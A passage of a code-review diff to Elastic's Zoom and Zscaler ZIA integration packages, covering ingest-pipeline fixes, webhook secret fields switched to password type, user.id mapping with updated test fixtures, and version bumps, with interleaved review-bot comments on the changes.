'webinar.sharing_started'].contains(ctx?.event?.action)" + if: "['webinar.started', 'webinar.sharing_started'].contains(ctx.event?.action)" - append: field: event.type value: end - if: "['webinar.ended', 'webinar.sharing_ended'].contains(ctx?.event?.action)" + if: "['webinar.ended', 'webinar.sharing_ended'].contains(ctx.event?.action)" - rename: field: zoom.object target_field: zoom.webinar 
@@ -46,28 +52,28 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.event?.action == 'webinar.updated' + if: ctx.event?.action == 'webinar.updated' ignore_failure: true - date: field: zoom.webinar.start_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'webinar.started' + if: ctx.event?.action == 'webinar.started' ignore_failure: true - date: field: zoom.participant.join_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'webinar.participant_joined' + if: ctx.event?.action == 'webinar.participant_joined' ignore_failure: true - date: field: zoom.participant.leave_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'webinar.participant_left' + if: ctx.event?.action == 'webinar.participant_left' ignore_failure: true # 
@@ -75,66 +81,66 @@ processors: # - set: field: user.id - value: '{{zoom.participant.id}}' + value: '{{{zoom.participant.id}}}' ignore_empty_value: true - if: 'ctx.zoom?.participant != null' + if: ctx.zoom?.participant != null - set: field: user.full_name - value: '{{zoom.participant.user_name}}' + value: '{{{zoom.participant.user_name}}}' ignore_empty_value: true - if: 'ctx.zoom?.participant != null' + if: ctx.zoom?.participant != null # # set user.* from registrant # - set: field: user.id - value: '{{zoom.registrant.id}}' + value: '{{{zoom.registrant.id}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant != null' + if: ctx.zoom?.registrant != null - set: field: user.email - value: '{{zoom.registrant.email}}' + value: '{{{zoom.registrant.email}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant != null' + if: ctx.zoom?.registrant != null - set: field: user.full_name value: '{{zoom.registrant.first_name}} {{zoom.registrant.last_name}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant != null' + if: ctx.zoom?.registrant != null # # set user.* from operator # - set: field: user.id - value: '{{zoom.operator_id}}' + value: '{{{zoom.operator_id}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant == null && ctx.zoom?.participant == null' + if: ctx.zoom?.registrant == null && ctx.zoom?.participant == null - set: field: user.email - value: '{{zoom.operator}}' + value: '{{{zoom.operator}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant == null && ctx.zoom?.participant == null' + if: ctx.zoom?.registrant == null && ctx.zoom?.participant == null # # append to related.user # - append: field: related.user - value: "{{zoom.webinar.host_id}}" + value: "{{{zoom.webinar.host_id}}}" allow_duplicates: false - if: "ctx.zoom?.webinar?.host_id != null" + if: ctx.zoom?.webinar?.host_id != null - append: field: related.user - value: "{{zoom.registrant.id}}" + value: "{{{zoom.registrant.id}}}" allow_duplicates: false - if: "ctx.zoom?.registrant?.id != null" + if: 
ctx.zoom?.registrant?.id != null - append: field: related.user - value: "{{zoom.participant.id}}" + value: "{{{zoom.participant.id}}}" allow_duplicates: false - if: "ctx.zoom?.participant?.id != null" + if: ctx.zoom?.participant?.id != null on_failure: - set: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/zoomroom.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/zoomroom.yml index 232a54fe6fd..e91586a150d 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/zoomroom.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/zoomroom.yml @@ -4,15 +4,15 @@ processors: - append: field: event.type value: info - if: "['zoomroom.checked_in', 'zoomroom.checked_out'].contains(ctx?.event?.action)" + if: "['zoomroom.checked_in', 'zoomroom.checked_out'].contains(ctx.event?.action)" - append: field: event.type value: start - if: ctx?.event?.action == 'zoomroom.checked_in' + if: ctx.event?.action == 'zoomroom.checked_in' - append: field: event.type value: end - if: ctx?.event?.action == 'zoomroom.checked_out' + if: ctx.event?.action == 'zoomroom.checked_out' - rename: field: zoom.object target_field: zoom.zoomroom diff --git a/packages/zoom/data_stream/webhook/manifest.yml b/packages/zoom/data_stream/webhook/manifest.yml index df3ef519119..0c2160a4a06 100644 --- a/packages/zoom/data_stream/webhook/manifest.yml +++ b/packages/zoom/data_stream/webhook/manifest.yml @@ -38,12 +38,13 @@ streams: show_user: true default: false - name: crc_secret - type: text + type: password title: Zoom Secret Token description: Secret token provided by Zoom when the webhook was configured. It is used for the CRC validation of the webhook endpoint. multi: false required: false show_user: true + secret: true - name: secret_header type: text title: Zoom Custom Header 
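Review bot: `crc_secret` in this hunk and `secret_value` in the next are moved to `type: password` with `secret: true`, which is the right storage class, but both stay `required: false` and neither description says what happens when the value is left empty. If the input accepts webhook POSTs without the custom-header check when `secret_value` is unset (the input handler is not part of this diff, so this is inferred), the `secret_value` description should state it, e.g. appending `If left empty, incoming requests are not verified.`, so an operator makes that choice deliberately rather than by default. Marking `secret_header` as `secret: false` is correct, since the header name itself is not sensitive.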
@@ -52,13 +53,15 @@ streams: required: false show_user: true default: Authorization + secret: false - name: secret_value - type: text + type: password title: Zoom Custom Header value description: Custom header value used to validate the authenticity of incoming Zoom POST requests. It should be created by the user when configuring the webhook on Zoom. See [Verify webhook events](https://developers.zoom.us/docs/api/rest/webhook-reference/#custom-header) for more information. multi: false required: false show_user: true + secret: true - name: ssl type: yaml title: TLS diff --git a/packages/zoom/manifest.yml b/packages/zoom/manifest.yml index eda21403602..3517285db66 100644 --- a/packages/zoom/manifest.yml +++ b/packages/zoom/manifest.yml @@ -1,13 +1,13 @@ name: zoom title: Zoom -version: "1.18.0" +version: "1.19.0" description: Collect logs from Zoom with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security", "productivity_security"] conditions: kibana: - version: ^8.9.0 + version: ^8.12.0 policy_templates: - name: zoom title: Zoom logs diff --git a/packages/zscaler_zia/_dev/deploy/docker/docker-compose.yml b/packages/zscaler_zia/_dev/deploy/docker/docker-compose.yml index 4e7631234c1..8f1365031fe 100644 --- a/packages/zscaler_zia/_dev/deploy/docker/docker-compose.yml +++ b/packages/zscaler_zia/_dev/deploy/docker/docker-compose.yml 
@@ -1,37 +1,32 @@ version: "2.3" services: zscaler-zia-alerts-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9010 -p=tcp /sample_logs/alerts.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9010 -p=tcp /sample_logs/alerts.log zscaler-zia-dns-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9011 -p=tcp /sample_logs/dns.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9011 -p=tcp /sample_logs/dns.log zscaler-zia-firewall-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9012 -p=tcp /sample_logs/firewall.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9012 -p=tcp /sample_logs/firewall.log zscaler-zia-tunnel-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9013 -p=tcp /sample_logs/tunnel.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9013 -p=tcp /sample_logs/tunnel.log zscaler-zia-web-tcp: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s 
--addr elastic-agent:9014 -p=tcp /sample_logs/web.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9014 -p=tcp /sample_logs/web.log zscaler-zia-dns-http-endpoint: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -40,7 +35,7 @@ services: - STREAM_WEBHOOK_HEADER=Content-Type=application/ndjson command: log --start-signal=SIGHUP --delay=5s /sample_logs/dns-http_endpoint.log zscaler-zia-firewall-http-endpoint: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -49,7 +44,7 @@ services: - STREAM_WEBHOOK_HEADER=Content-Type=application/ndjson command: log --start-signal=SIGHUP --delay=5s /sample_logs/firewall-http_endpoint.log zscaler-zia-tunnel-http-endpoint: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: @@ -58,7 +53,7 @@ services: - STREAM_WEBHOOK_HEADER=Content-Type=application/ndjson command: log --start-signal=SIGHUP --delay=5s /sample_logs/tunnel-http_endpoint.log zscaler-zia-web-http-endpoint: - image: docker.elastic.co/observability/stream:v0.10.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro environment: diff --git a/packages/zscaler_zia/changelog.yml b/packages/zscaler_zia/changelog.yml index 7effcb15fb6..639a2331ac1 100644 --- a/packages/zscaler_zia/changelog.yml +++ b/packages/zscaler_zia/changelog.yml 
@@ -1,4 +1,19 @@ # newer versions go on top +- version: "2.19.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "2.18.3" + changes: + - description: Remove `ignore_failure` clause in web events. + type: bugfix + link: https://github.com/elastic/integrations/pull/9193 +- version: "2.18.2" + changes: + - description: Fix mapping of user identities. + type: bugfix + link: https://github.com/elastic/integrations/pull/9041 - version: "2.18.1" changes: - description: Changed owners diff --git a/packages/zscaler_zia/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json b/packages/zscaler_zia/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json index 54d8feca149..b2007003265 100644 --- a/packages/zscaler_zia/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json +++ b/packages/zscaler_zia/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-12-31T12:01:04.000Z", + "@timestamp": "2024-12-31T12:01:04.000Z", "destination": { "address": "175.16.199.1", "ip": "175.16.199.1", @@ -34,7 +34,7 @@ } }, { - "@timestamp": "2023-12-31T13:02:05.000Z", + "@timestamp": "2024-12-31T13:02:05.000Z", "destination": { "address": "81.2.69.193", "ip": "81.2.69.193", @@ -68,7 +68,7 @@ } }, { - "@timestamp": "2023-12-31T14:03:06.000Z", + "@timestamp": "2024-12-31T14:03:06.000Z", "destination": { "address": "81.2.69.193", "ip": "81.2.69.193" diff --git a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log index d4ec642282d..ed62cd3d6d5 100644 --- a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log +++ b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log 
@@ -1 +1,3 @@ {"sourcetype":"zscalernss-dns","input": {"type": "http_endpoint"}, "event":{"location":"Unknown","deviceowner":"NA","devicehostname":"NA","dns_req":"Unknown","resaction":"None","durationms":"34000","category":"Other","resrulelabel":"None","dns_reqtype":"NotFound","dns_resp":"NotFound","department":"Unknown","user":"Unknown","reqaction":"None","datetime":"Tue Dec 31 02:22:22 2021","srv_dip":"0.0.0.0","clt_sip":"0.0.0.0","reqrulelabel":"None","srv_dport":"0"}} +{"sourcetype":"zscalernss-dns","input": {"type": "http_endpoint"}, "event":{"location":"Unknown","deviceowner":"NA","devicehostname":"NA","dns_req":"Unknown","resaction":"None","durationms":"34000","category":"Other","resrulelabel":"None","dns_reqtype":"NotFound","dns_resp":"NotFound","department":"Unknown","user":"Unknown","reqaction":"None","time":"Tue Dec 31 02:22:22 2021","srv_dip":"0.0.0.0","clt_sip":"0.0.0.0","reqrulelabel":"None","srv_dport":"0"}} +{"sourcetype":"zscalernss-dns","input": {"type": "http_endpoint"}, "event":{"location":"Unknown","deviceowner":"NA","devicehostname":"NA","dns_req":"Unknown","resaction":"None","durationms":"34000","category":"Other","resrulelabel":"None","dns_reqtype":"NotFound","dns_resp":"NotFound","department":"Unknown","user":"person@example.com","reqaction":"None","datetime":"Tue Dec 31 02:22:22 2021","srv_dip":"0.0.0.0","clt_sip":"0.0.0.0","reqrulelabel":"None","srv_dport":"0"}} diff --git a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log-expected.json b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log-expected.json index da65622f0b6..18390f4c339 100644 --- a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log-expected.json +++ b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log-expected.json @@ -51,6 +51,7 @@ "preserve_original_event" ], "user": { + "id": "Unknown", "name": [ "Unknown" ] 
@@ -79,6 +80,166 @@ } } } + }, + { + "@timestamp": "2021-12-31T02:22:22.000Z", + "destination": { + "ip": "0.0.0.0", + "port": 0 + }, + "dns": { + "answers": { + "name": "NotFound" + }, + "question": { + "name": "Unknown", + "type": "NotFound" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "duration": 34000000000, + "kind": "event", + "original": "{\"sourcetype\":\"zscalernss-dns\",\"input\": {\"type\": \"http_endpoint\"}, \"event\":{\"location\":\"Unknown\",\"deviceowner\":\"NA\",\"devicehostname\":\"NA\",\"dns_req\":\"Unknown\",\"resaction\":\"None\",\"durationms\":\"34000\",\"category\":\"Other\",\"resrulelabel\":\"None\",\"dns_reqtype\":\"NotFound\",\"dns_resp\":\"NotFound\",\"department\":\"Unknown\",\"user\":\"Unknown\",\"reqaction\":\"None\",\"time\":\"Tue Dec 31 02:22:22 2021\",\"srv_dip\":\"0.0.0.0\",\"clt_sip\":\"0.0.0.0\",\"reqrulelabel\":\"None\",\"srv_dport\":\"0\"}}", + "type": [ + "info" + ] + }, + "network": { + "protocol": "dns" + }, + "related": { + "hosts": [ + "Unknown", + "NotFound" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "Unknown" + ] + }, + "source": { + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "id": "Unknown", + "name": [ + "Unknown" + ] + }, + "zscaler_zia": { + "dns": { + "department": "Unknown", + "dom": { + "category": "Other" + }, + "duration": { + "milliseconds": 34000 + }, + "location": "Unknown", + "request": { + "action": "None", + "rule": { + "label": "None" + } + }, + "response": { + "action": "None", + "rule": { + "label": "None" + } + } + } + } + }, + { + "@timestamp": "2021-12-31T02:22:22.000Z", + "destination": { + "ip": "0.0.0.0", + "port": 0 + }, + "dns": { + "answers": { + "name": "NotFound" + }, + "question": { + "name": "Unknown", + "type": "NotFound" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "duration": 34000000000, + "kind": "event", + "original": 
"{\"sourcetype\":\"zscalernss-dns\",\"input\": {\"type\": \"http_endpoint\"}, \"event\":{\"location\":\"Unknown\",\"deviceowner\":\"NA\",\"devicehostname\":\"NA\",\"dns_req\":\"Unknown\",\"resaction\":\"None\",\"durationms\":\"34000\",\"category\":\"Other\",\"resrulelabel\":\"None\",\"dns_reqtype\":\"NotFound\",\"dns_resp\":\"NotFound\",\"department\":\"Unknown\",\"user\":\"person@example.com\",\"reqaction\":\"None\",\"datetime\":\"Tue Dec 31 02:22:22 2021\",\"srv_dip\":\"0.0.0.0\",\"clt_sip\":\"0.0.0.0\",\"reqrulelabel\":\"None\",\"srv_dport\":\"0\"}}", + "type": [ + "info" + ] + }, + "network": { + "protocol": "dns" + }, + "related": { + "hosts": [ + "Unknown", + "NotFound" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "person@example.com" + ] + }, + "source": { + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "person@example.com", + "id": "person@example.com" + }, + "zscaler_zia": { + "dns": { + "department": "Unknown", + "dom": { + "category": "Other" + }, + "duration": { + "milliseconds": 34000 + }, + "location": "Unknown", + "request": { + "action": "None", + "rule": { + "label": "None" + } + }, + "response": { + "action": "None", + "rule": { + "label": "None" + } + } + } + } } ] } \ No newline at end of file diff --git a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json index a7f3707f301..58b1b66b0c6 100644 --- a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json @@ -64,7 +64,8 @@ "89.160.20.156" ], "user": [ - "Owner77" + "Owner77", + "some_user@example.com" ] }, "source": { @@ -93,6 +94,7 @@ ], "user": { "email": "some_user@example.com", + "id": "some_user@example.com", "name": [ "Owner77" ] 
@@ -187,7 +189,8 @@ "89.160.20.156" ], "user": [ - "Owner77" + "Owner77", + "some_user@example.com" ] }, "source": { @@ -216,6 +219,7 @@ ], "user": { "email": "some_user@example.com", + "id": "some_user@example.com", "name": [ "Owner77" ] diff --git a/packages/zscaler_zia/data_stream/dns/elasticsearch/ingest_pipeline/default.yml b/packages/zscaler_zia/data_stream/dns/elasticsearch/ingest_pipeline/default.yml index 9ee34980c76..ce43414bfad 100644 --- a/packages/zscaler_zia/data_stream/dns/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zscaler_zia/data_stream/dns/elasticsearch/ingest_pipeline/default.yml @@ -212,6 +212,10 @@ processors: - append: field: error.message value: '{{{_ingest.on_failure_message}}}' + - set: + field: user.id + copy_from: json.user + ignore_empty_value: true - urldecode: field: json.user target_field: user.email @@ -239,6 +243,11 @@ processors: value: '{{{_ingest._value}}}' allow_duplicates: false ignore_missing: true + - append: + field: related.user + value: '{{{user.id}}}' + allow_duplicates: false + if: ctx.user?.id != null - urldecode: field: json.department target_field: zscaler_zia.dns.department diff --git a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall-http-endpoint.log-expected.json b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall-http-endpoint.log-expected.json index 3da143cc068..cc75e231391 100644 --- a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall-http-endpoint.log-expected.json +++ b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall-http-endpoint.log-expected.json @@ -49,6 +49,7 @@ "preserve_original_event" ], "user": { + "id": "Unknown", "name": [ "Unknown" ] diff --git a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log index c6ab96b1171..47bfa94098d 100644 
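Review bot: In the first dns pipeline hunk the new `set` copies `json.user` into `user.id` verbatim, while the `urldecode` directly below it decodes the same field into `user.email`, so a percent-encoded login would produce an encoded `user.id` (and `related.user` entry) next to a decoded `user.email`; the firewall fixture added in this commit shows the source does percent-encode values (`TestLoc%20DB`, `Access%20Blocked`). Consider deriving the id from the decoded value instead, e.g. a `set` with `copy_from: user.email` placed after the urldecode, or a second `urldecode` of `json.user` into `user.id`. The same pattern is added to the firewall pipeline in a later hunk of this commit. Both processors lists continue outside the hunks.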
--- a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log +++ b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log @@ -1 +1,2 @@ { "sourcetype" : "zscalernss-fw", "event" :{"datetime":"Fri Dec 31 07:07:07 2021","user":"some_user@example.com","department":"Unknown","locationname":"TestLoc%20DB","cdport":443,"csport":55018,"sdport":443,"ssport":0,"csip":"0.0.0.0","cdip":"0.0.0.0","ssip":"0.0.0.0","sdip":"0.0.0.0","tsip":"0.0.0.0","tunsport":0,"tuntype":"ZscalerClientConnector","action":"Drop","dnat":"No","stateful":"Yes","aggregate":"No","nwsvc":"HTTPS","nwapp":"http","proto":"TCP","ipcat":"Test Name","destcountry":"Ireland","avgduration":486,"rulelabel":"Access%20Blocked","inbytes":19052,"outbytes":1734,"duration":4,"durationms":4861,"numsessions":1,"ipsrulelabel":"None","threatcat":"None","threatname":"None","deviceowner":"admin77","devicehostname":"Machine9000"}} +{ "sourcetype" : "zscalernss-fw", "event" :{"datetime":"Fri Dec 31 07:07:07 2021","user":"some_user","department":"Unknown","locationname":"TestLoc%20DB","cdport":443,"csport":55018,"sdport":443,"ssport":0,"csip":"0.0.0.0","cdip":"0.0.0.0","ssip":"0.0.0.0","sdip":"0.0.0.0","tsip":"0.0.0.0","tunsport":0,"tuntype":"ZscalerClientConnector","action":"Drop","dnat":"No","stateful":"Yes","aggregate":"No","nwsvc":"HTTPS","nwapp":"http","proto":"TCP","ipcat":"Test Name","destcountry":"Ireland","avgduration":486,"rulelabel":"Access%20Blocked","inbytes":19052,"outbytes":1734,"duration":4,"durationms":4861,"numsessions":1,"ipsrulelabel":"None","threatcat":"None","threatname":"None","devicehostname":"Machine9000"}} diff --git a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json index 1661d532031..770f4d6ca5e 100644 --- a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json 
+++ b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json @@ -42,7 +42,8 @@ "0.0.0.0" ], "user": [ - "admin77" + "admin77", + "some_user@example.com" ] }, "rule": { @@ -61,6 +62,7 @@ ], "user": { "email": "some_user@example.com", + "id": "some_user@example.com", "name": [ "admin77" ] 
@@ -107,6 +109,114 @@ } } } + }, + { + "@timestamp": "2021-12-31T07:07:07.000Z", + "destination": { + "bytes": 19052, + "geo": { + "country_name": "Ireland" + }, + "ip": "0.0.0.0", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "drop", + "category": [ + "network" + ], + "duration": 4861000000, + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-fw\", \"event\" :{\"datetime\":\"Fri Dec 31 07:07:07 2021\",\"user\":\"some_user\",\"department\":\"Unknown\",\"locationname\":\"TestLoc%20DB\",\"cdport\":443,\"csport\":55018,\"sdport\":443,\"ssport\":0,\"csip\":\"0.0.0.0\",\"cdip\":\"0.0.0.0\",\"ssip\":\"0.0.0.0\",\"sdip\":\"0.0.0.0\",\"tsip\":\"0.0.0.0\",\"tunsport\":0,\"tuntype\":\"ZscalerClientConnector\",\"action\":\"Drop\",\"dnat\":\"No\",\"stateful\":\"Yes\",\"aggregate\":\"No\",\"nwsvc\":\"HTTPS\",\"nwapp\":\"http\",\"proto\":\"TCP\",\"ipcat\":\"Test Name\",\"destcountry\":\"Ireland\",\"avgduration\":486,\"rulelabel\":\"Access%20Blocked\",\"inbytes\":19052,\"outbytes\":1734,\"duration\":4,\"durationms\":4861,\"numsessions\":1,\"ipsrulelabel\":\"None\",\"threatcat\":\"None\",\"threatname\":\"None\",\"devicehostname\":\"Machine9000\"}}", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Machine9000" + }, + "network": { + "application": "http", + "community_id": "1:hQwW1HWTOUYlk7y4+T2D+UPDU1c=", + "protocol": "https", + "transport": "tcp" + }, + "related": { + "hosts": [ + "Machine9000" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "some_user" + ] + }, + "rule": { + "name": [ + "Access Blocked", + "None" + ] + }, + "source": { + "bytes": 1734, + "ip": "0.0.0.0", + "port": 55018 + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "id": "some_user", + "name": [ + "some_user" + ] + }, + "zscaler_zia": { + "firewall": { + "aggregate": "No", + "client": { + "destination": { + "ip": "0.0.0.0", + "port": 443 + } + }, + "department": "Unknown", + "duration": { + "avg": 486, + "milliseconds": 4861, + "seconds": 
4 + }, + "hostname": "Machine9000", + "ip_category": "Test Name", + "location": { + "name": "TestLoc DB" + }, + "nat": "No", + "server": { + "source": { + "ip": "0.0.0.0", + "port": 0 + } + }, + "session": { + "count": 1.0 + }, + "stateful": "Yes", + "threat": { + "category": "None", + "name": "None" + }, + "tunnel": { + "ip": "0.0.0.0", + "port": 0, + "type": "ZscalerClientConnector" + } + } + } } ] } \ No newline at end of file diff --git a/packages/zscaler_zia/data_stream/firewall/elasticsearch/ingest_pipeline/default.yml b/packages/zscaler_zia/data_stream/firewall/elasticsearch/ingest_pipeline/default.yml index e95fbfe755d..fbcf6bef6d3 100644 --- a/packages/zscaler_zia/data_stream/firewall/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zscaler_zia/data_stream/firewall/elasticsearch/ingest_pipeline/default.yml @@ -151,6 +151,10 @@ processors: field: json.destcountry target_field: destination.geo.country_name ignore_missing: true + - set: + field: user.id + copy_from: json.user + ignore_empty_value: true - urldecode: field: json.user target_field: user.email @@ -178,6 +182,11 @@ processors: value: '{{{_ingest._value}}}' allow_duplicates: false ignore_missing: true + - append: + field: related.user + value: '{{{user.id}}}' + allow_duplicates: false + if: ctx.user?.id != null && ctx.user.id != '' - urldecode: field: json.department target_field: zscaler_zia.firewall.department diff --git a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web-http-endpoint.log-expected.json b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web-http-endpoint.log-expected.json index 6d984f907cc..475a6756a69 100644 --- a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web-http-endpoint.log-expected.json +++ b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web-http-endpoint.log-expected.json @@ -48,7 +48,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { 
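Review bot: The append condition in the second firewall hunk, `if: ctx.user?.id != null && ctx.user.id != ''`, differs from the otherwise identical dns pipeline change earlier in this commit, which uses only `if: ctx.user?.id != null`. Since the `set` that populates `user.id` carries `ignore_empty_value: true`, an empty `user.id` is not expected in either pipeline, so the extra clause is likely redundant here; either drop it or add it to the dns pipeline so the two stay in step. The processors list continues outside the hunk.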
@@ -73,6 +74,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -172,7 +174,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -197,6 +200,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" diff --git a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log index ffbc90fbd27..288b661c8dc 100644 --- a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log +++ b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log 
@@ -5,3 +5,7 @@ { "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Dec 31 07:07:07 2021","login":"test@example.com","proto":"HTTPS","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Blocked","appname":"General Browsing","appclass":"General Browsing","reqsize":"297","respsize":"14135","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Business and Economy","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"GET","respcode":"403","eua":"Microsoft-Delivery-Optimization/10.0","ereferer":"None","ruletype":"FwFilter","rulelabel":"Access Blocked","contenttype":"Other","unscannabletype":"None","deviceowner":"administrator1","devicehostname":"TestMachine35"}} { "sourcetype" : "zscalernss-web", "event" :{"time":"Thu Aug 29 09:20:35 2022","login":"test@example.com","proto":"HTTP_PROXY","eurl":"www.example.com:443","action":"Allowed","appname":"General Browsing","appclass":"General Browsing","reqsize":"555","respsize":"65","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Information Technology","urlcat":"Web Search","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test","dept":"Unknown","cip":"81.2.69.193","sip":"89.160.20.112","reqmethod":"CONNECT","respcode":"200","eua":"Windows Microsoft Windows 10 Pro ZTunnel/1.0","ereferer":"None","ruletype":"None","rulelabel":"None","contenttype":"Other","unscannabletype":"None","deviceowner":"administrator1","devicehostname":"TestMachine35"}} { "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Dec 31 07:07:07 2021","login":"test@example.com","proto":"HTTPS","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Blocked","appname":"General Browsing","appclass":"General 
